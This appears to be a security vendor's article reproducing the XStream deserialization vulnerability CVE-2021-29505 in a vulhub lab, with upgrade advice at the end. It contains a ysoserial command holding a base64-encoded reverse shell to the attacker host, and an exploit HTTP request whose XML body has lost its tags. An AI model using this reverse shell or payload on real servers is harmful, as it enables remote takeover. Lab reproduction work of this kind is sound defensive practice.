• 提交需求
    *
    *

    *
    *
    *
    立即提交
    点击”立即提交”,表明我理解并同意 《黄金城科技隐私条款》

    logo

      产品与服务
      解决方案
      技术支持
      合作发展
      关于黄金城

      申请试用
        Xstream远程代码执行漏洞复现
        发布时间:2021-06-18 阅读次数: 402 次

        XStream是一个常用的Java对象和XML相互转换的工具,攻击者通过构造恶意的XML文档,可绕过XStream的黑名单,触发反序列化,从而造成反序列化代码执行漏洞。该漏洞允许远程攻击者直接获取服务器权限。


        漏洞编号

        CVE-2021-29505


        影响范围


        xStream <= 1.4.16


        环境搭建


        1. 使用vulhub进行漏洞环境搭建


        https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml


        2.执行如下命令启动镜像环境


        docker-compose up -d


        图片


        3. 访问地址:http://192.168.166.133:8080/


        图片

        漏洞复现


        攻击机ip:192.168.166.131

        靶机ip:192.168.166.133


        1.在攻击机上使用ysoserial的JRMPListener启动一个恶意的RMI Registry(工具下载地址:https://github.com/frohoff/ysoserial)。其中的bash命令需要进行bash64编码。


        图片


        2.Bash64编码后的反弹shell命令如下


        java -cp ysoserial-master.jarysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNjYuMTMxLzIzMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"


        3.执行过程如下


        图片


        4.执行如下数据包


        POST / HTTP/1.1

        Host:192.168.166.133:8080

        User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101Firefox/88.0

        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

        Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

        Connection:keep-alive

        Upgrade-Insecure-Requests:1

        Content-Type:application/xml

        Content-Length:3119


           

           

               

                   2

               

               3

               

                   12345

                   

                       com.sun.xml.internal.ws.api.message.Packet@2002fc1dContent

                   

               

               

                   12345

                   

                       

                          true

                          SOAP_11

                           


      •                    

                              false

                               

                                   

                                       

                                         

                                              aa

                                              aa

                                         

                                           

                                             

                                             

                                                 

                                                       UnicastRef

                                                      192.168.166.131

                                                      1099

                                                       0

                                                      0

                                                      0

                                                      0

                                                      false

                                                 

                                             

                                              192.168.166.131

                                               1099

                                         

                                     

                                   

                               

                           

                       

                   

             

           


        图片


        5. 获取反弹shell


        图片


        修复建议


        升级XStream到1.4.17版本及以上版本。

        免费试用
        服务热线

        马上咨询

        400-811-3777

        回到顶部
      • 【网站地图】【sitemap】